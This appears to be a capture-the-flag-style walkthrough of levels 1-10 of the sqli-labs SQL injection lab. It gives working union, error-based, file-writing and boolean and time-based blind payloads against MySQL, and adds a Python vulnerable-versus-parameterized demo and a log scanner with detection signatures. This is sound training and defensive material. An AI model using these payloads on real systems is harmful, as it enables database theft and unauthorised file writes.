sqli-labs (Less 1-10)

Less-1: single quotes

Append ?id=1' order by N%23 to the URL to guess the column count: with N=3 the page displays normally, with N=4 it errors, so there are 3 columns.
Then a union query:

?id=1' and 1=2 union select 1,2,3'#

The injection points (the echoed columns) are 2 and 3.
Replacing the 2 and 3 in union select 1,2,3 in turn with user(), version() and database() returns root@localhost, 10.1.19-MariaDB and security respectively.
payload:

?id=1' and 1=2 union select 1,user(),version()'#

Dump the table names:

and 1=2 union select 1,group_concat(TABLE_NAME),3 from information_schema.tables where  table_schema = database()%23

Tables: emails, referers, uagents, users

Use the following payload (the hex value is one of the table names found above):

and 1=2 union select 1,group_concat(COLUMN_NAME),3 from information_schema.columns where  TABLE_NAME =0x7265666572657273 %23

This returns the column names of each table.

Since the database is the same for every level, no screenshots are included below.
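The Less-1 mechanics, as an added example that is not part of the original write-up: a small Python/sqlite3 model of a query built like the lab's WHERE id='$id' LIMIT 0,1. The column-count probe (order by 3 versus order by 4) and the union payload both work against the string-concatenated version and fall flat against the parameterized one, because a bound parameter never becomes part of the SQL text. The table, rows and function names are constructed for this example; sqlite has no # comment, so the payloads end in -- as the later levels of the write-up do.

```python
import sqlite3

# Constructed sample rows; they stand in for the lab's users table, not its real contents.
SAMPLE_USERS = [
    (1, "alice", "alice-pass"),
    (2, "bob", "bob-pass"),
    (3, "carol", "carol-pass"),
]


def make_db():
    """Build an in-memory database shaped like the lab's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Less-1 pattern: the id parameter is spliced into the SQL text inside single quotes.

    Returns the result rows, or an 'error: ...' string when the database rejects the
    statement (that visible error is what the order-by probe in the write-up relies on).
    """
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"error: {exc}"


def lookup_safe(conn, user_id):
    """Same query with a bound parameter: quotes inside the value cannot change the statement."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


# Payloads from the write-up, with sqlite's '--' comment in place of MySQL's '#'.
PROBE_OK = "1' order by 3--"                              # 3 columns exist: runs normally
PROBE_ERR = "1' order by 4--"                             # no 4th column: the database errors
UNION = "1' and 1=2 union select 1,'injected','row'--"    # attacker-chosen row replaces the real one


def demo():
    """Run every payload against both variants and collect the outcomes."""
    conn = make_db()
    return {
        "probe_ok": lookup_vulnerable(conn, PROBE_OK),
        "probe_err": lookup_vulnerable(conn, PROBE_ERR),
        "union_vulnerable": lookup_vulnerable(conn, UNION),
        "union_safe": lookup_safe(conn, UNION),
        "normal_safe": lookup_safe(conn, 1),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>16}: {result}")
```

The probe_err entry is the same "column out of range" class of error that the write-up reads off the lab page; the union_safe entry is empty because the parameterized query compares the whole payload string against the id column as data.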

Less-2: integer

Using ?id=1 order by N shows there are 3 columns.
A union query shows the injection points are still columns 2 and 3.
database() and user() return security and root@localhost respectively.
payload:

?id=1 and 1=2 union select 1,database(),user()

Query all table names:

?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()

Query all columns:

?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73

Less-3: single quotes with twist

Testing the closing type shows it is ')

?id=1') order by N%23

This shows there are 3 columns; then the union query:

?id=1') and 1=2 union select 1,2,3%23

The injection points are columns 2 and 3.
Query user() and database():

?id=1') and 1=2 union select 1,user(),database()%23

Dump the tables:

?id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()%23

Changing the table name accordingly dumps all column names:

?id=1') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73 %23

Less-4: Double Quotes

After testing, ?id=1" can be used to see the error message.
Then close the statement and find the column count at the same time:

?id=1") order by N

There are 3 columns.

?id=1") and 1=2 union select 1,2,3%23

The injection points are columns 2 and 3.
Query user() and database():

?id=1") and 1=2 union select 1,user(),database()%23

Query the tables:

?id=1") and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()%23

Dump the column names:

?id=1") and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73 %23

Less-5: Double Injection - Single Quotes

Probing with ?id=1 and ?id=1': the latter errors, but with %23 appended it no longer errors.
Knowing the structure, ?id=1' order by N %23 shows there are 3 columns.
Just when I thought it was the same old routine, I found that probing the injection points gives no echo, so I searched Baidu for blind injection and found a similar injection method:
http://www.freebuf.com/column/158705.html

Then I wrote one modelled on it:

?id=1' union select 1,count(*),concat(user(),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23

The user() in this statement can be replaced with database() to query it.

Then query the table names:

?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23

The first number in limit 1,1 can be changed to 2 and 3 to get uagents and users respectively.

Then query the column names:

?id=1' union select 1,count(*),concat((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'referers' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23

Change the first number of limit 1,1 to step through the column names, and change the value of table_name to query the columns of each table.

Less-6: Double Injection - Double Quotes

After some testing, the principle is similar to Less-5: simply changing the single quotes in the Less-5 injection statements to double quotes injects successfully.

Less-7: Dump into outfile

After probing, no error messages were displayed, so I looked at the source file.

It seems the error messages were deliberately hidden.
With no clue, I had to search Baidu:
https://blog.csdn.net/sherlock17/article/details/64454449
sqli-labs less-7

First I added secure_file_priv = "E:/text" to my local MySQL my.ini (the path is only for reference; the line can go anywhere in the file, just preferably not at the very start).
Then start injecting (we know there are 3 columns from the earlier levels; the count can also be found with union select 1,2,3.. adding numbers until it works):

?id=1')) union select 1,user(),database() into outfile "E:/text/main.txt" --+

This produces the external file.

Export the table names:

?id=1')) union select '*','*', table_name from information_schema.tables where table_schema='security' into outfile "E:/text/table.txt"--+

Export the column names (emails):

?id=1')) union select '*','*',column_name from information_schema.columns where table_schema='security' and table_name='emails' into outfile "E:/text/emails.txt"--+

Less-8: Blind - Boolean Based - Single Quotes

After several injection tests I found:
When the injected statement is correct the page shows You Are in…; when the query errors, nothing is shown.
?id=1' order by N--+ shows there are 3 columns.
Split each value up, test each character, then piece the complete value back together; but typing every request by hand is tedious and time-consuming, and I don't know how to write a program to dump the data…
payload:

?id=1' and if(substr((select database()),1,1)='s',0,1)--+

substr(A,a,1) does the matching:
A is a statement you build yourself (it must return a single value, so the subqueries below carry a limit clause whose first number is stepped through), and a is a number incremented from 1.

select database()
select table_name from information_schema.tables where table_schema='security' limit 0,1
select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1

Less-9: Blind - Time Based - Single Quotes

Time-based blind injection (single quotes)
The page does not change regardless of whether the injected syntax is correct. Adding sleep(10) makes one branch of the comparison delay the page load, so the response time shows whether the match is correct.

?id=1' and if(substr(A,a,1)=x,0,sleep(10))%23

The structure is the same as above; if the match target x is a character it needs single quotes.

Less-10: Blind - Time Based - Double Quotes

Time-based blind injection (double quotes)
Just change the single quotes in the Less-9 statements to double quotes.
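Seen from the server side, every payload family in Less 1-10 leaves a recognisable trace in the web server's access log: a quote followed by order by, union select, information_schema, floor(rand(, into outfile, substr( and sleep(, and a URL-encoded comment character (%23 / --+) that ordinary links never carry. The following Python scanner is an added example, not part of the original write-up; it URL-decodes each request path once, lowercases it and tags it with the families it matches. The log lines are constructed for the example (requests 2-6 replay this write-up's payloads against a lab host, 1 and 7 are ordinary traffic), and the signature names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in common log format (not taken from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2018:10:00:01 +0800] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 1412',
    '10.0.0.5 - - [01/Jun/2018:10:00:07 +0800] "GET /sqli-labs/Less-1/?id=1%27%20order%20by%204%23 HTTP/1.1" 200 1530',
    '10.0.0.5 - - [01/Jun/2018:10:00:19 +0800] "GET /sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%201,group_concat(TABLE_NAME),3%20from%20information_schema.tables%20where%20table_schema%20=%20database()%23 HTTP/1.1" 200 1603',
    '10.0.0.5 - - [01/Jun/2018:10:01:02 +0800] "GET /sqli-labs/Less-5/?id=1%27%20union%20select%201,count(*),concat(user(),0x26,floor(rand(0)*2))x%20from%20information_schema.columns%20group%20by%20x%23 HTTP/1.1" 200 1488',
    '10.0.0.5 - - [01/Jun/2018:10:02:40 +0800] "GET /sqli-labs/Less-7/?id=1%27))%20union%20select%201,user(),database()%20into%20outfile%20%22E:/text/main.txt%22%20--+ HTTP/1.1" 200 1321',
    '10.0.0.5 - - [01/Jun/2018:10:03:55 +0800] "GET /sqli-labs/Less-9/?id=1%27%20and%20if(substr((select%20database()),1,1)=%27s%27,0,sleep(10))%23 HTTP/1.1" 200 1402',
    '10.0.0.9 - - [01/Jun/2018:10:04:10 +0800] "GET /blog/search?q=how+to+select+a+union+rep HTTP/1.1" 200 8711',
]

# One signature per payload family used in Less 1-10; tags are reported in this order.
SIGNATURES = [
    ("column-probe",  re.compile(r"'\s*\)*\s*order\s+by\s+\d+")),
    ("union-based",   re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema-enum",   re.compile(r"\binformation_schema\.(?:tables|columns)\b")),
    ("error-based",   re.compile(r"\bfloor\s*\(\s*rand\s*\(")),
    ("file-write",    re.compile(r"\binto\s+(?:out|dump)file\b")),
    ("boolean-blind", re.compile(r"\b(?:substr|substring|mid|ascii)\s*\(")),
    ("time-based",    re.compile(r"\b(?:sleep|benchmark)\s*\(")),
    # A '#' can only reach the server percent-encoded, so after decoding it is a strong hint;
    # '--+' becomes '-- ' once the '+' is decoded to a space.
    ("comment-tail",  re.compile(r"(?:--\s|#|/\*)")),
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def classify(line):
    """Return the raw request path and the payload-family tags that match it."""
    m = REQUEST_RE.search(line)
    if not m:
        return {"path": None, "tags": []}
    raw_path = m.group(1)
    # Decode percent-escapes and '+' once, then lowercase, so encoding does not hide keywords.
    decoded = unquote_plus(raw_path).lower()
    tags = [name for name, rx in SIGNATURES if rx.search(decoded)]
    return {"path": raw_path, "tags": tags}


def scan(lines):
    """Return (path, tags) for every line that triggers at least one signature."""
    hits = []
    for line in lines:
        result = classify(line)
        if result["tags"]:
            hits.append((result["path"], result["tags"]))
    return hits


if __name__ == "__main__":
    for path, tags in scan(SAMPLE_LOG):
        print(", ".join(tags).ljust(48), path)
```

Decoding exactly once matters: the signatures are applied to what the database would see, while double-decoding would also open the way to false matches. The comment-tail tag on its own is only a hint; combined with any other tag on the same request it is a high-confidence indicator, and the time-based tag is worth correlating with the response time the log records.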